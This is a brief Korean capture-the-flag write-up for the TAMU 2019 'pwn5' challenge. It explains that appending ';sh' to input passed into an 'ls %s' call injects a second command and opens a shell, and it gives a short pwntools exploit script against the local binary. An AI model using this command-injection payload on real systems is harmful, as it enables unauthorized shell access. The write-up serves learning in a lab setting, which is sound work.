[TAMU 2019] pwn5

일단 sh를 쉘에 입력하면 쉘이 뜨는 것을 알고 sh 명령어를 사용할 수 있으면 되겠다고 생각했다.

근데 ls %s 로 명령어를 실행해서 어떻게 하면 ls한 후 sh를 실행하도록 할까 시도를 계속해보다가

ls ; sh

로 입력하면 ls 명령어를 실행한 후 sh 명령어를 실행하도록 할 수 있었다.

따라서 입력할 때 ;sh로 주면 ls ;sh로 명령어가 실행되서 쉘을 실행시킬 수 있다.

 

#!/usr/bin/python 
from pwn import *

p = process("./pwn5")

p.sendafter("pass to ls:\n", ';sh')

p.interactive()

; sh로 주면 h가 잘려서 ;sh로 붙여서 줘야 제대로 쉘이 따진다.